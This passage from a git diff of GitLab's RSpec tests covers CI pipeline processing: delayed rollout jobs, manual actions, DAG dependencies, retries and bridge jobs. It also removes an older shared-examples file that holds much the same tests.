allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + context 'when builds are successful' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' 
}) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout10%') + end + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout100%') + end + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'success' }) + expect(pipeline.reload.status).to eq 'success' + end + end + + context 'when build job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'failed' }) + expect(pipeline.reload.status).to eq 'failed' + end + end + + context 'when rollout 10% is unscheduled' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + unschedule + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'manual' }) + expect(pipeline.reload.status).to eq 'manual' + end + + context 'when user plays rollout 10%' do + it 'schedules rollout100%' do + process_pipeline + succeed_pending + unschedule + play_manual_action('rollout10%') + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) + expect(pipeline.reload.status).to eq 'scheduled' + end + end + end + + context 'when 
rollout 10% fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout10%') + end + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'failed' }) + expect(pipeline.reload.status).to eq 'failed' + end + + context 'when user retries rollout 10%' do + it 'does not schedule rollout10% again' do + process_pipeline + succeed_pending + enqueue_scheduled('rollout10%') + fail_running_or_pending + retry_build('rollout10%') + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) + expect(pipeline.reload.status).to eq 'running' + end + end + end + + context 'when rollout 10% is played immidiately' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + play_manual_action('rollout10%') + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) + expect(pipeline.reload.status).to eq 'running' + end + end + end + + context 'when only one scheduled job exists in a pipeline' do + before do + create_build('delayed', **delayed_options, stage_idx: 0) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) + + expect(pipeline.reload.status).to eq 'scheduled' + end + end + + context 'when there are two delayed jobs in a stage' do + before do + create_build('delayed1', **delayed_options, stage_idx: 0) + 
create_build('delayed2', **delayed_options, stage_idx: 0) + create_build('job', stage_idx: 1) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'blocks the stage until all scheduled jobs finished' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed1': 'scheduled', 'delayed2': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('delayed1') + end + + expect(builds_names_and_statuses).to eq({ 'delayed1': 'pending', 'delayed2': 'scheduled' }) + expect(pipeline.reload.status).to eq 'running' + end + end + + context 'when a delayed job is allowed to fail' do + before do + create_build('delayed', **delayed_options, allow_failure: true, stage_idx: 0) + create_build('job', stage_idx: 1) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'blocks the stage and continues after it failed' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('delayed') + end + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'delayed': 'failed', 'job': 'pending' }) + expect(pipeline.reload.status).to eq 'pending' + end + end + end + + context 'when an exception is raised during a persistent ref creation' do + before do + successful_build('test', stage_idx: 0) + + allow_next_instance_of(Ci::PersistentRef) do |instance| + allow(instance).to receive(:delete_refs) { raise ArgumentError } + end + end + + it 'process the pipeline' do + expect { process_pipeline }.not_to raise_error + end + end + + context 'when there are manual action in earlier stages' do + context 'when first stage has only optional manual actions' do + before do + create_build('build', stage_idx: 0, when: 'manual', allow_failure: true) + create_build('check', stage_idx: 1) + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'starts from the second stage' do + 
expect(all_builds_statuses).to eq %w[manual pending created] + end + end + + context 'when second stage has only optional manual actions' do + before do + create_build('check', stage_idx: 0) + create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'skips second stage and continues on third stage', :sidekiq_inline do + expect(all_builds_statuses).to eq(%w[pending created created]) + + builds.first.success + + expect(all_builds_statuses).to eq(%w[success manual pending]) + end + end + end + + context 'when there are only manual actions in stages' do + before do + create_build('image', stage_idx: 0, when: 'manual', allow_failure: true) + create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) + create_build('deploy', stage_idx: 2, when: 'manual') + create_build('check', stage_idx: 3) + + process_pipeline + end + + it 'processes all jobs until blocking actions encountered' do + expect(all_builds_statuses).to eq(%w[manual manual manual created]) + expect(all_builds_names).to eq(%w[image build deploy check]) + + expect(pipeline.reload).to be_blocked + end + end + + context 'when there is only one manual action' do + before do + create_build('deploy', stage_idx: 0, when: 'manual', allow_failure: true) + + process_pipeline + end + + it 'skips the pipeline' do + expect(pipeline.reload).to be_skipped + end + + context 'when the action was played' do + before do + play_manual_action('deploy') + end + + it 'queues the action and pipeline', :sidekiq_inline do + expect(all_builds_statuses).to eq(%w[pending]) + + expect(pipeline.reload).to be_pending + end + end + end + + context 'when blocking manual actions are defined', :sidekiq_inline do + before do + create_build('code:test', stage_idx: 0) + create_build('staging:deploy', stage_idx: 1, when: 'manual') + create_build('staging:test', stage_idx: 2, when: 'on_success') + create_build('production:deploy', stage_idx: 3, when: 
'manual') + create_build('production:test', stage_idx: 4, when: 'always') + end + + context 'when first stage succeeds' do + it 'blocks pipeline on stage with first manual action' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + expect(pipeline.reload.status).to eq 'pending' + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy] + expect(builds_statuses).to eq %w[success manual] + expect(pipeline.reload).to be_manual + end + end + + context 'when first stage fails' do + it 'does not take blocking action into account' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + expect(pipeline.reload.status).to eq 'pending' + + fail_running_or_pending + + expect(builds_names).to eq %w[code:test production:test] + expect(builds_statuses).to eq %w[failed pending] + + succeed_running_or_pending + + expect(builds_statuses).to eq %w[failed success] + expect(pipeline.reload).to be_failed + end + end + + context 'when pipeline is promoted sequentially up to the end' do + before do + # Users need ability to merge into a branch in order to trigger + # protected manual actions. 
+ # + create(:protected_branch, :developers_can_merge, + name: 'master', project: project) + end + + it 'properly processes entire pipeline' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy] + expect(builds_statuses).to eq %w[success manual] + expect(pipeline.reload).to be_manual + + play_manual_action('staging:deploy') + + expect(builds_statuses).to eq %w[success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test] + expect(builds_statuses).to eq %w[success success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy] + expect(builds_statuses).to eq %w[success success success manual] + + expect(pipeline.reload).to be_manual + expect(pipeline.reload).to be_blocked + expect(pipeline.reload).not_to be_active + expect(pipeline.reload).not_to be_complete + + play_manual_action('production:deploy') + + expect(builds_statuses).to eq %w[success success success pending] + expect(pipeline.reload).to be_running + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy production:test] + expect(builds_statuses).to eq %w[success success success success pending] + expect(pipeline.reload).to be_running + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy production:test] + expect(builds_statuses).to eq %w[success success success success success] + expect(pipeline.reload).to be_success + end + end + end + + context 'when second stage has only on_failure jobs', :sidekiq_inline do + before do + create_build('check', stage_idx: 0) + create_build('build', stage_idx: 1, when: 'on_failure') + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'skips 
second stage and continues on third stage' do + expect(all_builds_statuses).to eq(%w[pending created created]) + + builds.first.success + + expect(all_builds_statuses).to eq(%w[success skipped pending]) + end + end + + context 'when failed build in the middle stage is retried', :sidekiq_inline do + context 'when failed build is the only unsuccessful build in the stage' do + before do + create_build('build:1', stage_idx: 0) + create_build('build:2', stage_idx: 0) + create_build('test:1', stage_idx: 1) + create_build('test:2', stage_idx: 1) + create_build('deploy:1', stage_idx: 2) + create_build('deploy:2', stage_idx: 2) + end + + it 'does trigger builds in the next stage' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build:1', 'build:2'] + + succeed_running_or_pending + + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] + + pipeline.builds.find_by(name: 'test:1').success! + pipeline.builds.find_by(name: 'test:2').drop! + + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] + + Ci::Build.retry(pipeline.builds.find_by(name: 'test:2'), user).reset.success! 
+ + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2', + 'test:2', 'deploy:1', 'deploy:2'] + end + end + end + + context 'when builds with auto-retries are configured', :sidekiq_inline do + before do + create_build('build:1', stage_idx: 0, user: user, options: { script: 'aa', retry: 2 }) + create_build('test:1', stage_idx: 1, user: user, when: :on_failure) + create_build('test:2', stage_idx: 1, user: user, options: { script: 'aa', retry: 1 }) + end + + it 'automatically retries builds in a valid order' do + expect(process_pipeline).to be_truthy + + fail_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1] + expect(builds_statuses).to eq %w[failed pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1 test:2] + expect(builds_statuses).to eq %w[failed success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1 test:2] + expect(builds_statuses).to eq %w[failed success success] + + expect(pipeline.reload).to be_success + end + end + + context 'when pipeline with needs is created', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } + let!(:mac_build) { create_build('mac:build', stage: 'build', stage_idx: 0) } + let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:linux_rubocop) { create_build('linux:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:mac_rspec) { create_build('mac:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:mac_rubocop) { create_build('mac:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2) } + + let!(:linux_rspec_on_build) { create(:ci_build_need, build: linux_rspec, name: 'linux:build') } + let!(:linux_rubocop_on_build) { create(:ci_build_need, build: linux_rubocop, name: 'linux:build') } + + 
let!(:mac_rspec_on_build) { create(:ci_build_need, build: mac_rspec, name: 'mac:build') } + let!(:mac_rubocop_on_build) { create(:ci_build_need, build: mac_rubocop, name: 'mac:build') } + + it 'when linux:* finishes first it runs it out of order' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created created)) + expect(builds.pending).to contain_exactly(linux_build, mac_build) + + # we follow the single path of linux + linux_build.reset.success! + + expect(stages).to eq(%w(running pending created)) + expect(builds.success).to contain_exactly(linux_build) + expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) + + linux_rspec.reset.success! + + expect(stages).to eq(%w(running running created)) + expect(builds.success).to contain_exactly(linux_build, linux_rspec) + expect(builds.pending).to contain_exactly(mac_build, linux_rubocop) + + linux_rubocop.reset.success! + + expect(stages).to eq(%w(running running created)) + expect(builds.success).to contain_exactly(linux_build, linux_rspec, linux_rubocop) + expect(builds.pending).to contain_exactly(mac_build) + + mac_build.reset.success! + mac_rspec.reset.success! + mac_rubocop.reset.success! + + expect(stages).to eq(%w(success success pending)) + expect(builds.success).to contain_exactly( + linux_build, linux_rspec, linux_rubocop, mac_build, mac_rspec, mac_rubocop) + expect(builds.pending).to contain_exactly(deploy) + end + + context 'when one of the jobs is run on a failure' do + let!(:linux_notify) { create_build('linux:notify', stage: 'deploy', stage_idx: 2, when: 'on_failure', scheduling_type: :dag) } + + let!(:linux_notify_on_build) { create(:ci_build_need, build: linux_notify, name: 'linux:build') } + + context 'when another job in build phase fails first' do + it 'does skip linux:notify' do + expect(process_pipeline).to be_truthy + + mac_build.reset.drop! + linux_build.reset.success! 
+ + expect(linux_notify.reset).to be_skipped + end + end + + context 'when linux:build job fails first' do + it 'does run linux:notify' do + expect(process_pipeline).to be_truthy + + linux_build.reset.drop! + + expect(linux_notify.reset).to be_pending + end + end + end + + context 'when there is a job scheduled with dag but no need (needs: [])' do + let!(:deploy_pages) { create_build('deploy_pages', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } + + it 'runs deploy_pages without waiting prior stages' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created pending)) + expect(builds.pending).to contain_exactly(linux_build, mac_build, deploy_pages) + + linux_build.reset.success! + deploy_pages.reset.success! + + expect(stages).to eq(%w(running pending running)) + expect(builds.success).to contain_exactly(linux_build, deploy_pages) + expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) + + linux_rspec.reset.success! + linux_rubocop.reset.success! + mac_build.reset.success! + mac_rspec.reset.success! + mac_rubocop.reset.success! + + expect(stages).to eq(%w(success success running)) + expect(builds.pending).to contain_exactly(deploy) + end + end + end + + context 'when a needed job is skipped', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } + let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } + + before do + create(:ci_build_need, build: deploy, name: 'linux:build') + end + + it 'skips the jobs depending on it' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created created)) + expect(all_builds.pending).to contain_exactly(linux_build) + + linux_build.reset.drop! 
+ + expect(stages).to eq(%w(failed skipped skipped)) + expect(all_builds.failed).to contain_exactly(linux_build) + expect(all_builds.skipped).to contain_exactly(linux_rspec, deploy) + end + end + + context 'when a needed job is manual', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0, when: 'manual', allow_failure: true) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 1, scheduling_type: :dag) } + + before do + create(:ci_build_need, build: deploy, name: 'linux:build') + end + + it 'makes deploy DAG to be skipped' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(skipped skipped)) + expect(all_builds.manual).to contain_exactly(linux_build) + expect(all_builds.skipped).to contain_exactly(deploy) + end + end + + context 'when a bridge job has parallel:matrix config', :sidekiq_inline do + let(:parent_config) do + <<-EOY + test: + stage: test + script: echo test + + deploy: + stage: deploy + trigger: + include: .child.yml + parallel: + matrix: + - PROVIDER: ovh + STACK: [monitoring, app] + EOY + end + + let(:child_config) do + <<-EOY + test: + stage: test + script: echo test + EOY + end + + let(:pipeline) do + Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload + end + + before do + allow_next_instance_of(Repository) do |repository| + allow(repository) + .to receive(:blob_data_at) + .with(an_instance_of(String), '.gitlab-ci.yml') + .and_return(parent_config) + + allow(repository) + .to receive(:blob_data_at) + .with(an_instance_of(String), '.child.yml') + .and_return(child_config) + end + end + + it 'creates pipeline with bridges, then passes the matrix variables to downstream jobs' do + expect(all_builds_names).to contain_exactly('test', 'deploy: [ovh, monitoring]', 'deploy: [ovh, app]') + expect(all_builds_statuses).to contain_exactly('pending', 'created', 'created') + + succeed_pending + + # bridge jobs directly transition to success + 
expect(all_builds_statuses).to contain_exactly('success', 'success', 'success') + + bridge1 = all_builds.find_by(name: 'deploy: [ovh, monitoring]') + bridge2 = all_builds.find_by(name: 'deploy: [ovh, app]') + + downstream_job1 = bridge1.downstream_pipeline.processables.first + downstream_job2 = bridge2.downstream_pipeline.processables.first + + expect(downstream_job1.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'monitoring') + expect(downstream_job2.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'app') + end + end + + context 'when a bridge job has invalid downstream project', :sidekiq_inline do + let(:config) do + <<-EOY + test: + stage: test + script: echo test + + deploy: + stage: deploy + trigger: + project: invalid-project + EOY + end + + let(:pipeline) do + Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload + end + + before do + stub_ci_pipeline_yaml_file(config) + end + + it 'creates a pipeline, then fails the bridge job' do + expect(all_builds_names).to contain_exactly('test', 'deploy') + expect(all_builds_statuses).to contain_exactly('pending', 'created') + + succeed_pending + + expect(all_builds_names).to contain_exactly('test', 'deploy') + expect(all_builds_statuses).to contain_exactly('success', 'failed') + end + end + + private + + def all_builds + pipeline.processables.order(:stage_idx, :id) + end + + def builds + all_builds.where.not(status: [:created, :skipped]) + end + + def stages + pipeline.reset.stages.map(&:status) + end + + def builds_names + builds.pluck(:name) + end + + def builds_names_and_statuses + builds.each_with_object({}) do |b, h| + h[b.name.to_sym] = b.status + h + end + end + + def all_builds_names + all_builds.pluck(:name) + end + + def builds_statuses + builds.pluck(:status) + end + + def all_builds_statuses + all_builds.pluck(:status) + end + + def succeed_pending + builds.pending.each do |build| + build.reset.success + end + end + + def 
succeed_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.success + end + end + + def fail_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.drop + end + end + + def cancel_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.cancel + end + end + + def play_manual_action(name) + builds.find_by(name: name).play(user) + end + + def enqueue_scheduled(name) + builds.scheduled.find_by(name: name).enqueue_scheduled + end + + def retry_build(name) + Ci::Build.retry(builds.find_by(name: name), user) + end + + def manual_actions + pipeline.manual_actions.reload + end + + def create_build(name, **opts) + create(:ci_build, :created, pipeline: pipeline, name: name, **with_stage_opts(opts)) + end + + def successful_build(name, **opts) + create(:ci_build, :success, pipeline: pipeline, name: name, **with_stage_opts(opts)) + end + + def with_stage_opts(opts) + { stage: "stage-#{opts[:stage_idx].to_i}" }.merge(opts) + end + + def delayed_options + { when: 'delayed', options: { script: %w(echo), start_in: '1 minute' } } + end + + def unschedule + pipeline.builds.scheduled.map(&:unschedule) + end + end private diff --git a/spec/services/ci/pipeline_processing/shared_processing_service.rb b/spec/services/ci/pipeline_processing/shared_processing_service.rb deleted file mode 100644 index 8de9b308429..00000000000 --- a/spec/services/ci/pipeline_processing/shared_processing_service.rb +++ /dev/null @@ -1,1040 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_examples 'Pipeline Processing Service' do - let(:project) { create(:project, :repository) } - let(:user) { project.owner } - - let(:pipeline) do - create(:ci_empty_pipeline, ref: 'master', project: project) - end - - context 'when simple pipeline is defined' do - before do - create_build('linux', stage_idx: 0) - create_build('mac', stage_idx: 0) - create_build('rspec', stage_idx: 1) - create_build('rubocop', stage_idx: 1) - 
create_build('deploy', stage_idx: 2) - end - - it 'processes a pipeline', :sidekiq_inline do - expect(process_pipeline).to be_truthy - - succeed_pending - - expect(builds.success.count).to eq(2) - - succeed_pending - - expect(builds.success.count).to eq(4) - - succeed_pending - - expect(builds.success.count).to eq(5) - end - - it 'does not process pipeline if existing stage is running' do - expect(process_pipeline).to be_truthy - expect(builds.pending.count).to eq(2) - - expect(process_pipeline).to be_falsey - expect(builds.pending.count).to eq(2) - end - end - - context 'custom stage with first job allowed to fail' do - before do - create_build('clean_job', stage_idx: 0, allow_failure: true) - create_build('test_job', stage_idx: 1, allow_failure: true) - end - - it 'automatically triggers a next stage when build finishes', :sidekiq_inline do - expect(process_pipeline).to be_truthy - expect(builds_statuses).to eq ['pending'] - - fail_running_or_pending - - expect(builds_statuses).to eq %w(failed pending) - - fail_running_or_pending - - expect(pipeline.reload).to be_success - end - end - - context 'when optional manual actions are defined', :sidekiq_inline do - before do - create_build('build', stage_idx: 0) - create_build('test', stage_idx: 1) - create_build('test_failure', stage_idx: 2, when: 'on_failure') - create_build('deploy', stage_idx: 3) - create_build('production', stage_idx: 3, when: 'manual', allow_failure: true) - create_build('cleanup', stage_idx: 4, when: 'always') - create_build('clear:cache', stage_idx: 4, when: 'manual', allow_failure: true) - end - - context 'when builds are successful' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build 
test deploy production) - expect(builds_statuses).to eq %w(success success pending manual) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test deploy production cleanup clear:cache) - expect(builds_statuses).to eq %w(success success success manual pending manual) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success success success manual success manual) - expect(pipeline.reload.status).to eq 'success' - end - end - - context 'when test job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure) - expect(builds_statuses).to eq %w(success failed pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test test_failure cleanup) - expect(builds_statuses).to eq %w(success failed success pending) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success failed success success) - expect(pipeline.reload.status).to eq 'failed' - end - end - - context 'when test and test_failure jobs fail' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure) - expect(builds_statuses).to eq %w(success failed pending) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test test_failure cleanup) - expect(builds_statuses).to eq %w(success failed failed pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test 
test_failure cleanup) - expect(builds_statuses).to eq %w(success failed failed success) - expect(pipeline.reload.status).to eq('failed') - end - end - - context 'when deploy job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - succeed_running_or_pending - - expect(builds_names).to eq %w(build test deploy production) - expect(builds_statuses).to eq %w(success success pending manual) - - fail_running_or_pending - - expect(builds_names).to eq %w(build test deploy production cleanup) - expect(builds_statuses).to eq %w(success success failed manual pending) - - succeed_running_or_pending - - expect(builds_statuses).to eq %w(success success failed manual success) - expect(pipeline.reload).to be_failed - end - end - - context 'when build is canceled in the second stage' do - it 'does not schedule builds after build has been canceled' do - expect(process_pipeline).to be_truthy - expect(builds_names).to eq ['build'] - expect(builds_statuses).to eq ['pending'] - - succeed_running_or_pending - - expect(builds.running_or_pending).not_to be_empty - expect(builds_names).to eq %w(build test) - expect(builds_statuses).to eq %w(success pending) - - cancel_running_or_pending - - expect(builds.running_or_pending).to be_empty - expect(builds_names).to eq %w[build test] - expect(builds_statuses).to eq %w[success canceled] - expect(pipeline.reload).to be_canceled - end - end - - context 'when listing optional manual actions' do - it 'returns only for skipped builds' do - # currently all builds are created - expect(process_pipeline).to be_truthy - expect(manual_actions).to be_empty - - # succeed stage build - succeed_running_or_pending - - expect(manual_actions).to be_empty - - # succeed stage test - succeed_running_or_pending - - 
expect(manual_actions).to be_one # production - - # succeed stage deploy - succeed_running_or_pending - - expect(manual_actions).to be_many # production and clear cache - end - end - end - - context 'when delayed jobs are defined', :sidekiq_inline do - context 'when the scene is timed incremental rollout' do - before do - create_build('build', stage_idx: 0) - create_build('rollout10%', **delayed_options, stage_idx: 1) - create_build('rollout100%', **delayed_options, stage_idx: 2) - create_build('cleanup', stage_idx: 3) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - context 'when builds are successful' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout10%') - end - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout100%') - end - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'success' }) - expect(pipeline.reload.status).to eq 'success' - end - end - - context 'when build job fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'failed' }) - expect(pipeline.reload.status).to eq 'failed' - end - end - - context 'when rollout 10% is unscheduled' do - it 'properly processes the pipeline' 
do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - unschedule - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'manual' }) - expect(pipeline.reload.status).to eq 'manual' - end - - context 'when user plays rollout 10%' do - it 'schedules rollout100%' do - process_pipeline - succeed_pending - unschedule - play_manual_action('rollout10%') - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) - expect(pipeline.reload.status).to eq 'scheduled' - end - end - end - - context 'when rollout 10% fails' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('rollout10%') - end - fail_running_or_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'failed' }) - expect(pipeline.reload.status).to eq 'failed' - end - - context 'when user retries rollout 10%' do - it 'does not schedule rollout10% again' do - process_pipeline - succeed_pending - enqueue_scheduled('rollout10%') - fail_running_or_pending - retry_build('rollout10%') - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) - expect(pipeline.reload.status).to eq 'running' - end - end - end - - context 'when rollout 10% is played immidiately' do - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) - - succeed_pending - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' 
}) - - play_manual_action('rollout10%') - - expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) - expect(pipeline.reload.status).to eq 'running' - end - end - end - - context 'when only one scheduled job exists in a pipeline' do - before do - create_build('delayed', **delayed_options, stage_idx: 0) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'properly processes the pipeline' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) - - expect(pipeline.reload.status).to eq 'scheduled' - end - end - - context 'when there are two delayed jobs in a stage' do - before do - create_build('delayed1', **delayed_options, stage_idx: 0) - create_build('delayed2', **delayed_options, stage_idx: 0) - create_build('job', stage_idx: 1) - - allow(Ci::BuildScheduleWorker).to receive(:perform_at) - end - - it 'blocks the stage until all scheduled jobs finished' do - expect(process_pipeline).to be_truthy - expect(builds_names_and_statuses).to eq({ 'delayed1': 'scheduled', 'delayed2': 'scheduled' }) - - travel_to 2.minutes.from_now do - enqueue_scheduled('delayed1') - end - - expect(builds_names_and_statuses).to eq({ 'delayed1': 'pending', 'delayed2': 'scheduled' }) - expect(pipeline.reload.status).to eq 'running' - end - end - - context 'when a delayed job is allowed to fail' do - before do - create_build('delayed', **delayed_options, allow_failure: true, stage_idx: 0) - create_build('job', stage_idx: 1) - - 